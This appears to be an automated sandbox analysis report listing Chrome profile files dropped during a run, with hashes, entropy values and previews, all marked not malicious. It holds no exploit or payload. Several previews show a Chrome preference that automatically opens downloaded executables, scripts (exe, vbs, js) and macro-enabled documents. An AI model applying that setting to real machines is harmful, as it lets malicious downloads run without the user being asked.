Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	19795
Entropy (8bit):	5.563990957298606
Encrypted:	false
SSDEEP:	384:RoXt3LlxpXG1kXqKf/pUZNCgVLH2HfDyrUNHG5lZr74J:SLlzG1kXqKf/pUZNCgVLH2Hf+rUxGxru
MD5:	69B9CC88195BCE3421189F519640AD75
SHA1:	865EA4CF0790E8A88D3DAE6A15001591834EB8FE
SHA-256:	7661F803B25594727D37293DA9E9435CCF36DB2F61259FB9DF2E8B909EFB8C58
SHA-512:	D4F90CE9FE2C7CABEBA1AA64EAB66338B12EC14224D912921950A000A2E3C8A95B6E2B89D2EE2B734B0076086F26224631CFA4D475D841D3668417BBEEA0F9DC
Malicious:	false
Preview:	{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13298721014497197","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	11217
Entropy (8bit):	6.069602775336632
Encrypted:	false
SSDEEP:	192:GbylJnlTwGB7V9Hne4qasKxXItmLG48gcLg/PkI:Gb+nldByaFx4toj8VEPT
MD5:	90F880064A42B29CCFF51FE5425BF1A3
SHA1:	6A3CAE3996E9FFF653A1DDF731CED32B2BE2ACBF
SHA-256:	965203D541E442C107DBC6D5B395168123D0397559774BEAE4E5B9ABC44EF268
SHA-512:	D9CBFCD865356F19A57954F8FD952CAF3D31B354112766C41892D1EF40BD2533682D4EC3F4DA0E59A5397364F67A484B45091BA94E6C69ED18AB681403DFD3F3
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["A+1PYW3V6CJbBuQ7aqrgYhyH3bT8PKyBXp3hN2slpI0=","WSOpQRkYTHjPSlG9Zif2a7TNhy43NDcG1Zg5Nv0UbH0=","jDctR8ImG5KZrQKm4kDjUB7FokSJfjo/pmvFowRVlaY=","LPxhhJiuU0lprt0T6flpS7TkaDg7MocrbmzO65xH6RI=","nZ9zLb2By96AkKXALRM+C0Eu11XUjPiMXEKjiCPdtHE=","wifibc1QfMBN2jrtUtLgsCefvuceTpAatmLvul11RJA=","dHjWlSIIdjj7MWqg3T8MG58RuuqRXk32vqi/13JqEgA=","zd3DV7dbvfNvx1hdhU01fW5ily52DLN0CFL/ADaEeTI=","DpjXcO85FFFY9KJFPkGNfFUtdQIOsGwO5jUckiUwY14=","gqid6l1+mk/6yWgUECRofI9lMipXgXh2jEN2+CxmPE0=","prDB91X2Mmfg/M/txVMITWBmEGbOGjqBTP7CMjYqdHs=","yLPAqV4gqoyS/zFkEt3Cn2j0q2v9QOSthVFfWn8EzCM=","EPQ3jzdrLkAHyvf3920B5Y3aAkO1IJdn/UtbnAmq6T0=","+oOc6ca+ChKUpTu+oa2ZRxRE+wG3QJmuYWEvYCs40NI=","3mBGNAiRlTANEQkqzU3TEi+5wJ0ubR5uwtS4/9OOM7w=","1A9NNawxuhu95H5eThvf1rewJ4QQWhhPNxJXO1C/n68=","E3vWLQxzmj+e5QxYbUscllJ5n0ITpw5JBHV1Kph3/KM=","i3I8ghdTF9c1ZXNBZmvsID+DV4gxBVN27rj9wsMtRpg=","R8B8qYabnMSlLPhrtu0hGYrHn3llsMHqBbi70gkIjEE=","rhlzuEvv2KRAFMms896xFwkNgPrw6WvmgPn6xrBSa2Y=","LAMXv6sRb0VZrY34aVXF3Fftxs

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	38
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	3:FQxlXNQxlX:qTCT
MD5:	51A2CBB807F5085530DEC18E45CB8569
SHA1:	7AD88CD3DE5844C7FC269C4500228A630016AB5B
SHA-256:	1C43A1BDA1E458863C46DFAE7FB43BFB3E27802169F37320399B1DD799A819AC
SHA-512:	B643A8FA75EDA90C89AB98F79D4D022BB81F1F62F50ED4E5440F487F22D1163671EC3AE73C4742C11830214173FF2935C785018318F4A4CAD413AE4EEEF985DF
Malicious:	false
Preview:	.f.5................f.5...............

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	372
Entropy (8bit):	5.1878855354439635
Encrypted:	false
SSDEEP:	6:nPGtU8uHuVq2Pwkn23iKKdK25+Xqx8chI+IFUtqVCPGtUBUOgZmwYVCPGtU6HIkP:nPGmVuVvYf5KkTXfchI3FUtRPGmBUOg6
MD5:	927426CC24DD318ECEE5DB5EF3F10C37
SHA1:	C0B4575B7A2AC8F5D21ED3249334554D97DA2F26
SHA-256:	8454658735652C5E5DF74EE318BADA72D3288AA9ECFF75F5336E97708375BFB9
SHA-512:	4C2332E5539010CFB07021272875F74A0D147FBD53FC818B4390D84E2DD122D9AEADF661378911A1C477281A0D5353E68AC0CEE507122E02D1FB5F7134424E0E
Malicious:	false
Preview:	2022/06/03-11:10:26.103 1bd0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2022/06/03-11:10:26.104 1bd0 Recovering log #3.2022/06/03-11:10:26.105 1bd0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	372
Entropy (8bit):	5.1878855354439635
Encrypted:	false
SSDEEP:	6:nPGtU8uHuVq2Pwkn23iKKdK25+Xqx8chI+IFUtqVCPGtUBUOgZmwYVCPGtU6HIkP:nPGmVuVvYf5KkTXfchI3FUtRPGmBUOg6
MD5:	927426CC24DD318ECEE5DB5EF3F10C37
SHA1:	C0B4575B7A2AC8F5D21ED3249334554D97DA2F26
SHA-256:	8454658735652C5E5DF74EE318BADA72D3288AA9ECFF75F5336E97708375BFB9
SHA-512:	4C2332E5539010CFB07021272875F74A0D147FBD53FC818B4390D84E2DD122D9AEADF661378911A1C477281A0D5353E68AC0CEE507122E02D1FB5F7134424E0E
Malicious:	false
Preview:	2022/06/03-11:10:26.103 1bd0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2022/06/03-11:10:26.104 1bd0 Recovering log #3.2022/06/03-11:10:26.105 1bd0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	469
Entropy (8bit):	5.040900368977623
Encrypted:	false
SSDEEP:	12:vvK3J7+xMAeLzANBRo2Z/pSvn1yYWBk778B/xgskJRvLdBfhdDJkWk:vUJceLqBRocA1yYsY78BJgskvv5pZkWk
MD5:	0099D3D332E08EDDF221CEE264465E8A
SHA1:	8518EE840106B324B5781E83CBA814FF3682DF92
SHA-256:	5A8345D641515E7FB52C62A4F3C86A7C366BB2F1BDEA6C77BD0B4726D9F5288E
SHA-512:	7BD263B393E9D4C01432D6D0B37C5198F4E1A45E2AA9AB974E94F58FAFC1722782F975E43B63B009C555EBA45C7870305FE71F59D210C83333063DBD1F416B35
Malicious:	false
Preview:	..........."+....1..c..desktop..file..html..user..usersG......1......c......desktop......file......html......user......users..2.........1........c........d........e...........f........h........i........j........k........l.........m........n........o.........p........r........s..........t.........u...:A.................................................................BM...I...... ........%file:///C:/Users/user/Desktop/1.html2.:................J...............!

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1518
Entropy (8bit):	4.8062213955365065
Encrypted:	false
SSDEEP:	24:Y26aL3M33ayFGRaXa63aDaaraqavatZa+RdsdydR/RdsdrJdMHQmQYhbG7n/iy:Y2nzM3qyvK6qDHGXCtwWs+RLs9zMHSYm
MD5:	10E45841166C3E8A4EC4EC7640B300FF
SHA1:	F57A740BB8FE6979AD50DB1A587B3AD06240CCA9
SHA-256:	3CF57024965FD1EA05D3AC849FF5538CBECC6086382F9825CC9345261C325C31
SHA-512:	27BF5F7B7D5457EE5BF1977B04E0FFCA941832518CECA65DD07F94CEC93E75B018432E6389CFAB582D7019BC57A15FEBB7C02BC78307DA711476259592EC82D0
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"isolation":[],"server":"https://redirector.gvt1.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expi

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4927
Entropy (8bit):	4.942296130114018
Encrypted:	false
SSDEEP:	48:Yc1kKSChkSirbNqARiqTlYGlQKHoTw0jrf4MqM8C1Nfct/9BhUJo3KhmeSnpNGzC:nVLR61pIKI95k0JCKL8nbOTlVuHn
MD5:	91B185C1006719F76197121E16706158
SHA1:	39E2BA8B661F1A4EF2DDE64FD9EF34B1A47762C5
SHA-256:	B8136336231CE45BA78EB4565923AB5D679C1173ECE217C5AF0740125A7FADBA
SHA-512:	C1ECA233CDE346D6B45DE87CC229E4F5CEE69C9CF9B1FBBC50850E1CF85B4182AF15DFDE837452CB1B46F2DD82D9E0D215D1CFD2D96EC5957973EFACDAE3366E
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13298721015354457","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245924509391818","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"bookmark_bar":{"show_on_all_tabs":false},"browser":{"default_browser_infobar_last_declined":"13245924607060180","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2042016"],"daily_rece

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	19796
Entropy (8bit):	5.56403969144979
Encrypted:	false
SSDEEP:	384:RoXt3LlxpXG1kXqKf/pUZNCgVLH2HfDyrUNHGklcr74N:SLlzG1kXqKf/pUZNCgVLH2Hf+rUxGPrC
MD5:	3B8502763C8797C9F82879D19CA25C05
SHA1:	7DEA9EF8991F6C38FE35872467908ED67EEA59B8
SHA-256:	7254F796D96C27FD2170398D970CE97AA7959375225D7B0D63573DBCFBB0A0D9
SHA-512:	DCE5BA9E77EC4789D09C3AC67C1C6AF442A2D17719AA43A922A481201E759062CF4DDF0A07A257012A55363AF75BEB164F7753E32585AF7B3EDCD80F615896AE
Malicious:	false
Preview:	{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13298721014497197","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\176bd4d4-b466-471c-b2dc-78592e59bf93.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	325
Entropy (8bit):	4.971623449303805
Encrypted:	false
SSDEEP:	6:YHpoNXR8+eq7JdV5p7DHJShsDHF4R8HLJ2AVQBR70S7PMVKJw1K3KnMRK3VY:YHO8sdHfHYhsBdLJlyH7E4f3K33y
MD5:	8CA9278965B437DFC789E755E4C61B82
SHA1:	5776B6C90CA1D2DDC765ED673B5E6DC8E167F0D6
SHA-256:	A57D9231244C1FBDE58A1BF50CAD3A1E3EA28D042BFA272782B65139446E7C51
SHA-512:	3065FE0743AD88E02F8C8FF6CF03B832B616DD08061EAE25A5106422228D45EB999EE2CBE4E9C96D5FFC108CB817766240E27BF97E3E5C2A58081D369E2968F8
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248516514667526","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	325
Entropy (8bit):	4.971623449303805
Encrypted:	false
SSDEEP:	6:YHpoNXR8+eq7JdV5p7DHJShsDHF4R8HLJ2AVQBR70S7PMVKJw1K3KnMRK3VY:YHO8sdHfHYhsBdLJlyH7E4f3K33y
MD5:	8CA9278965B437DFC789E755E4C61B82
SHA1:	5776B6C90CA1D2DDC765ED673B5E6DC8E167F0D6
SHA-256:	A57D9231244C1FBDE58A1BF50CAD3A1E3EA28D042BFA272782B65139446E7C51
SHA-512:	3065FE0743AD88E02F8C8FF6CF03B832B616DD08061EAE25A5106422228D45EB999EE2CBE4E9C96D5FFC108CB817766240E27BF97E3E5C2A58081D369E2968F8
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248516514667526","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\24aeaaec-c6e1-418d-ae0b-78d4b9410155.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	325
Entropy (8bit):	4.9616384877719995
Encrypted:	false
SSDEEP:	6:YHpoNXR8+eq7JdV5pirhsDHF4R8HLJ2AVQBR70S7PMVKJw1K3KnMRK3VY:YHO8sdHirhsBdLJlyH7E4f3K33y
MD5:	B0429187E1BE99DE4D548DC5B2EDEA0A
SHA1:	B3E07BEE5D753BF1B613BD2DE665C7C21E8184F6
SHA-256:	D8DABBF936DAB4F17437ECA255020EA847D76D6B789F9486010C95E995CFED03
SHA-512:	233F7BDAA848A295E9F58CA52761829FE1044DA1DE1FBCAC407FADC8C7ABA1E4FFD7CA7A4FBE649E83FD1815DC2E3619ACB2A22CE5B2C7241E474CDB9AF2F7ED
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248516523181804","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	325
Entropy (8bit):	4.9616384877719995
Encrypted:	false
SSDEEP:	6:YHpoNXR8+eq7JdV5pirhsDHF4R8HLJ2AVQBR70S7PMVKJw1K3KnMRK3VY:YHO8sdHirhsBdLJlyH7E4f3K33y
MD5:	B0429187E1BE99DE4D548DC5B2EDEA0A
SHA1:	B3E07BEE5D753BF1B613BD2DE665C7C21E8184F6
SHA-256:	D8DABBF936DAB4F17437ECA255020EA847D76D6B789F9486010C95E995CFED03
SHA-512:	233F7BDAA848A295E9F58CA52761829FE1044DA1DE1FBCAC407FADC8C7ABA1E4FFD7CA7A4FBE649E83FD1815DC2E3619ACB2A22CE5B2C7241E474CDB9AF2F7ED
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248516523181804","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\a182358f-eeb0-4c96-9334-2c24d711a51e.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4927
Entropy (8bit):	4.942296130114018
Encrypted:	false
SSDEEP:	48:Yc1kKSChkSirbNqARiqTlYGlQKHoTw0jrf4MqM8C1Nfct/9BhUJo3KhmeSnpNGzC:nVLR61pIKI95k0JCKL8nbOTlVuHn
MD5:	91B185C1006719F76197121E16706158
SHA1:	39E2BA8B661F1A4EF2DDE64FD9EF34B1A47762C5
SHA-256:	B8136336231CE45BA78EB4565923AB5D679C1173ECE217C5AF0740125A7FADBA
SHA-512:	C1ECA233CDE346D6B45DE87CC229E4F5CEE69C9CF9B1FBBC50850E1CF85B4182AF15DFDE837452CB1B46F2DD82D9E0D215D1CFD2D96EC5957973EFACDAE3366E
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13298721015354457","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245924509391818","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"bookmark_bar":{"show_on_all_tabs":false},"browser":{"default_browser_infobar_last_declined":"13245924607060180","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2042016"],"daily_rece

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\a5fa01d0-fad4-43b5-8785-f3c7de3bd90b.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	17703
Entropy (8bit):	5.576909857172219
Encrypted:	false
SSDEEP:	384:RoXt3LlxpXG1kXqKf/pUZNCgVLH2HfDyrUhl0r746:SLlzG1kXqKf/pUZNCgVLH2Hf+rUUr7R
MD5:	31D4AA1723FAD27E86084932A44FEE40
SHA1:	DB7FF12527A318C8816D8A37BA95B7D72B4E5695
SHA-256:	C23D6AB27CE3925F8873BAA58C72FCD7B7D5E6B4193E53CA8F291F11AF3C2C8C
SHA-512:	3BB80A87ABA844E574008AB23DEE4B3E5025AB9980AC5651680054A7445ABE16E1B137365F49FF2BF811E2BF25A56F030F970979CD9A923CCBD8E7BCE5F4CD17
Malicious:	false
Preview:	{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13298721014497197","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\a7329646-d142-463e-9e85-cbe79cec5f02.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3473
Entropy (8bit):	4.884843136744451
Encrypted:	false
SSDEEP:	96:6FGX0G70GhIGpyGzRDYLiEHYDBKGzUGaCGjHGESHG/OG6mhM:6Fe0i0sIIyGzRDYLiEHYDBKSUpCQHrSP
MD5:	494384A177157C36E9017D1FFB39F0BF
SHA1:	CE5D9754A70CD84CEE77C9180DB92C69715BE105
SHA-256:	07CF0A5189FAD30A4AA721F4F6DA1B15100991115833EACFA1E2DC84A1B54337
SHA-512:	BFB80EEC0C0B5D9E487047703BE49826321A4D249422E0C81E978E6C8A310F41C7B4B8F849229BA87484FDF4831DD6A98FF994D0FDA5CE3D341CE615C15F2F1C
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[],"expiration":"13248516607497410","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":27387},"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248516607334226","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":34287},"server":"https://ssl.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248516607463627","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31787},"server":"https://fonts.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248516607318875","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":23359},"server":"https://apis.google.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\a7b4c3e0-85bc-4988-85b0-22eefd7dd155.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4927
Entropy (8bit):	4.942296130114018
Encrypted:	false
SSDEEP:	48:Yc1kKSChkSirbNqARiqTlYGlQKHoTw0jrf4MqM8C1Nfct/9BhUJo3KhmeSnpNGzC:nVLR61pIKI95k0JCKL8nbOTlVuHn
MD5:	91B185C1006719F76197121E16706158
SHA1:	39E2BA8B661F1A4EF2DDE64FD9EF34B1A47762C5
SHA-256:	B8136336231CE45BA78EB4565923AB5D679C1173ECE217C5AF0740125A7FADBA
SHA-512:	C1ECA233CDE346D6B45DE87CC229E4F5CEE69C9CF9B1FBBC50850E1CF85B4182AF15DFDE837452CB1B46F2DD82D9E0D215D1CFD2D96EC5957973EFACDAE3366E
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13298721015354457","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245924509391818","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"bookmark_bar":{"show_on_all_tabs":false},"browser":{"default_browser_infobar_last_declined":"13245924607060180","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2042016"],"daily_rece

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cf283538-1e5c-40e6-b45c-1da386ddde2d.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4927
Entropy (8bit):	4.942296130114018
Encrypted:	false
